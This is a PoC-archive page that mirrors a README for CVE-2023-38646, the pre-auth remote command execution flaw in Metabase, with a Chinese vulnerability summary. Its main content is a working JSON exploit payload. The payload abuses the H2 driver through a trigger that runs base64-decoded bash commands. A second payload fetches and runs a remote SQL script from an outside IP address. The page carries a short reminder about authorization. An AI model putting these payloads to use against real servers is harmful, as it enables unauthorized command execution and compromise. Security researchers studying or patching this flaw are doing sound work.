关联漏洞
标题:
Metabase 安全漏洞
(CVE-2023-38646)
描述:Metabase是美国Metabase公司的一个开源数据分析平台。 Metabase 0.46.6.1之前版本和Metabase Enterprise 1.46.6.1之前版本存在安全漏洞,该漏洞源于允许攻击者以运行该服务的权限在服务器上执行任意命令。
描述
Metabase postgres (org.h2.Driver) RCE without INIT
介绍
### Extension of the Pre-Auth RCE in Metabase (CVE-2023-38646) explained [here](https://blog.assetnote.io/2023/07/22/pre-auth-rce-metabase/)
This helped me to avoid errors related to "database already in use" (with H2 and postgre as engines)
```json
{
"token": "TOKEN",
"details":
{
"is_on_demand": false,
"is_full_sync": false,
"is_sample": false,
"cache_ttl": null,
"refingerprint": false,
"auto_run_queries": true,
"schedules":{},
"details":
{
"advanced-options":true,
"classname":"org.h2.Driver",
"subname": "./metabase.jar;MODE=MSSQLServer;TRACE_LEVEL_SYSTEM_OUT=1\\;CREATE TRIGGER xel BEFORE SELECT ON INFORMATION_SCHEMA.TABLES AS $$//javascript\njava.lang.Runtime.getRuntime().exec('bash -c {echo,BASE64COMMAND}|{base64,-d}|{bash,-i}')\n$$--=x",
"subprotocol": "h2"
},
"engine": "postgres",
"name": "x"
}}
```
Instead of using directly h2 as engine with the INIT script, since its removed from our queries, we still using the db query for h2 engine
<details>
<summary>INIT script</summary>
<code>mem;test;INIT=RUNSCRIPT FROM 'http://10.10.10.10/sqlcmd.sql'</code>
<h3>In the .sql you specify the way to exec shell commands</h3>
</details>
# REFERENCE
https://blog.assetnote.io/2023/07/22/pre-auth-rce-metabase
### Written as a note, take it as vague documentation, you must have authorization to enumerate, exploit or simply test against any target
## Comments and contributions are welcome
文件快照
[4.0K] /data/pocs/e2730023118d3c2ebdabfc95a7db278e2aa89c77
└── [1.4K] README.md
0 directories, 1 file
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。